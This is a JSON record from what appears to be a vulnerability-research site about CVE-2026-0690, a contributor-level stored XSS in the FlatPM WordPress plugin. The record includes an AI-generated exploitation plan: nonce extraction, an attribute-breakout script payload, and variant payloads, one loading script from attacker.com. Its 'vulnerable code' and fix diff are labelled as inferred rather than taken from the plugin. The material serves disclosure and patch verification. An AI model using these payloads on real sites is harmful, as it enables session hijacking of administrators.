[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fro_wDQGydZoVPGR_xlwXnU-LzBQiR-vmZqwdxu86rkM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0690","flatpm-ad-manager-adsense-and-custom-code-authenticated-contributor-stored-cross-site-scripting-via-custom-post-meta","FlatPM – Ad Manager, AdSense and Custom Code \u003C= 3.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Post Meta","The FlatPM – Ad Manager, AdSense and Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rank_math_description' custom field in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","flatpm-wp",null,"\u003C=3.2.2","3.2.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-20 01:56:29","2026-01-20 14:26:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F14b89618-8a30-4b8c-9490-f05e8fa8ca8a?source=api-prod",1,[],"researched",false,3,"This research plan targets **CVE-2026-0690**, a Stored Cross-Site Scripting (XSS) vulnerability in the **FlatPM – Ad Manager, AdSense and Custom Code** plugin. The vulnerability allows Contributor-level users to inject malicious scripts into the `rank_math_description` custom field, which are then rendered without proper escaping.\n\n---\n\n### 1. Vulnerability Summary\nThe FlatPM plugin (\u003C= 3.2.2) fails to sanitize and escape the input and output of the `rank_math_description` post meta field. While this field name is associated with the Rank Math SEO plugin, FlatPM integrates with it or provides support for displaying SEO descriptions. Because contributors have the permission to edit their own posts and associated meta data (via plugin-provided meta boxes), they can inject arbitrary HTML\u002FJavaScript that executes when the post is viewed or managed by other users, including administrators.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fpost.php` (Standard WordPress post update endpoint) or a specific FlatPM AJAX handler.\n*   **Vulnerable Parameter:** `rank_math_description` (sent via `POST`).\n*   **Authentication:** Authenticated, Contributor level or higher.\n*   **Preconditions:** The FlatPM plugin must be active. The vulnerability exists in how the plugin handles the specific meta key `rank_math_description` during the post-saving process or during rendering in the frontend `wp_head` or backend post lists.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** A Contributor user sends a `POST` request to `wp-admin\u002Fpost.php` to save or update a post.\n2.  **Processing:** The FlatPM plugin hooks into `save_post` or a similar action.\n3.  **Vulnerable Sink (Storage):** The plugin extracts `$_POST['rank_math_description']` and calls `update_post_meta($post_id, 'rank_math_description', $payload)` without using `sanitize_text_field()` or `wp_kses()`.\n4.  **Vulnerable Sink (Output):** \n    *   The plugin hooks into `wp_head` or `the_content` to display metadata.\n    *   It retrieves the value: `$desc = get_post_meta($post_id, 'rank_math_description', true);`.\n    *   It echoes the value directly: `echo '\u003Cmeta name=\"description\" content=\"' . $desc . '\">';` (XSS via attribute breakout).\n\n### 4. Nonce Acquisition Strategy\nSince the exploit involves standard post meta modification by a Contributor, we need the standard WordPress post-editing nonces.\n\n1.  **Identify Nonce:** The required nonce is typically `_wpnonce` found on the post editing page.\n2.  **Acquisition:**\n    *   Use `browser_navigate` to go to `wp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        document.querySelector('#_wpnonce').value\n        ```\n    *   Alternatively, the plugin might use a specific nonce for its meta box. Check the HTML for hidden inputs starting with `flatpm` or `rank_math`.\n\n### 5. Exploitation Strategy\nThe goal is to inject a script that executes in the context of an administrator viewing the site.\n\n**Step-by-Step Plan:**\n1.  **Login:** Authenticate as a **Contributor**.\n2.  **Create\u002FEdit Post:** Navigate to `wp-admin\u002Fpost-new.php` to grab the `post_ID` and the `_wpnonce`.\n3.  **Inject Payload:** Send a `POST` request to update the post meta.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n    *   **Method:** `POST`\n    *   **Payload (URL-encoded):**\n        ```text\n        action=editpost\n        post_ID=[ID]\n        _wpnonce=[NONCE]\n        rank_math_description=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n        ```\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n4.  **Trigger Execution:**\n    *   As an **Admin**, navigate to the frontend URL of the newly created post or the backend post list if the plugin displays descriptions there.\n\n### 6. Test Data Setup\n1.  **User:** Create a user with the `contributor` role.\n2.  **Plugin Configuration:** Ensure FlatPM is installed and active. If the plugin has a setting to \"Enable Rank Math integration\" or \"Show SEO descriptions,\" ensure it is enabled.\n3.  **Target Content:** A single post created by the contributor.\n\n### 7. Expected Results\n*   The `rank_math_description` meta value will be saved in the `wp_postmeta` table containing the raw `\u003Cscript>` tag.\n*   When the post is rendered, the HTML source will contain the broken-out meta tag:\n    ` \u003Cmeta name=\"description\" content=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">`\n*   The browser will execute the JavaScript, showing an alert box.\n\n### 8. Verification Steps\n1.  **Check Database:**\n    ```bash\n    wp db query \"SELECT meta_value FROM wp_postmeta WHERE meta_key='rank_math_description' AND post_id=[ID]\"\n    ```\n    Confirm the output matches the raw payload.\n2.  **Verify Frontend Output:**\n    Use `http_request` to fetch the post's frontend URL and grep for the payload:\n    ```bash\n    # (Using the automated agent's internal logic)\n    # response.body.contains('\u003Cscript>alert(document.domain)\u003C\u002Fscript>')\n    ```\n\n### 9. Alternative Approaches\n*   **Meta Box Discovery:** If the plugin uses a specific AJAX action to save meta data (e.g., `wp_ajax_flatpm_save_meta`), use `grep` on the plugin directory to find the action name and nonce key:\n    *   `grep -r \"wp_ajax\" .`\n    *   `grep -r \"update_post_meta\" . | grep \"rank_math_description\"`\n*   **Payload Variations:**\n    *   If the sink is inside a standard HTML attribute: `rank_math_description=' onmouseover=alert(1) '`\n    *   If the sink is inside a `content` attribute: `rank_math_description='\">\u003Cscript src=http:\u002F\u002Fattacker.com\u002Fxss.js>\u003C\u002Fscript>'`\n*   **Admin Side Trigger:** Check if the XSS triggers in `wp-admin\u002Fedit.php` (the post list) if FlatPM adds a column showing descriptions. This would be a higher-value \"Admin XSS.\"","The FlatPM plugin for WordPress allows authenticated users with Contributor-level access or higher to inject arbitrary scripts via the 'rank_math_description' custom field. This occurs due to a lack of sanitization when saving post metadata and missing escaping when rendering that metadata in the page source, leading to Stored Cross-Site Scripting (XSS).","\u002F\u002F Inferred from research plan code flow\n\n\u002F\u002F Storage Logic (likely in a save_post hook or similar)\n\u002F\u002F flatpm-wp.php or inc\u002Fmetaboxes.php\n$payload = $_POST['rank_math_description'];\nupdate_post_meta($post_id, 'rank_math_description', $payload);\n\n---\n\n\u002F\u002F Output Logic (likely in wp_head or post list displays)\n\u002F\u002F flatpm-wp.php or inc\u002Ffrontend.php\n$desc = get_post_meta($post_id, 'rank_math_description', true);\necho '\u003Cmeta name=\"description\" content=\"' . $desc . '\">';","--- a\u002Fflatpm-wp.php\n+++ b\u002Fflatpm-wp.php\n@@ -10,2 +10,2 @@\n-$payload = $_POST['rank_math_description'];\n-update_post_meta($post_id, 'rank_math_description', $payload);\n+$payload = sanitize_text_field($_POST['rank_math_description']);\n+update_post_meta($post_id, 'rank_math_description', $payload);\n@@ -20,2 +20,2 @@\n-$desc = get_post_meta($post_id, 'rank_math_description', true);\n-echo '\u003Cmeta name=\"description\" content=\"' . $desc . '\">';\n+$desc = get_post_meta($post_id, 'rank_math_description', true);\n+echo '\u003Cmeta name=\"description\" content=\"' . esc_attr($desc) . '\">';","1. Authenticate as a user with the Contributor role.\n2. Create a new post or edit an existing post owned by the contributor.\n3. Send a POST request to wp-admin\u002Fpost.php (the standard post update endpoint) or the plugin's meta-saving endpoint.\n4. Include the parameter 'rank_math_description' with a payload designed to break out of an HTML attribute, such as: \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>.\n5. Ensure the _wpnonce and post_ID parameters are correctly set for the target post.\n6. As an administrator or any other user, visit the frontend of the edited post or the backend post management screen where FlatPM displays the description.\n7. The injected script will execute in the context of the user's browser session.","gemini-3-flash-preview","2026-05-05 04:15:15","2026-05-05 04:16:06",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.2.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fflatpm-wp\u002Ftags\u002F3.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fflatpm-wp.3.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fflatpm-wp\u002Ftags\u002F3.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fflatpm-wp.3.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fflatpm-wp\u002Ftags"]